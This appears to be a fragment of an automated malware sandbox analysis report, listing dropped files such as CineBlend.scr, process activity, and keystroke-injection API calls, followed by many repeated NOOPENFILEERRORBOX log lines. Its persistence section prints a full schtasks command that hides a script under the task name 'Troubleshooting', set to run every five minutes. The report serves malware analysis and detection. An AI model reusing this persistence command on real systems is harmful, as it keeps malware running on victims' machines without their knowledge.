Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	File created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00BC26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	36_2_00BC26DD
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 36_2_00B4FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	36_2_00B4FC7C
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_006626DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	38_2_006626DD
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 38_2_005EFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	38_2_005EFC7C

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
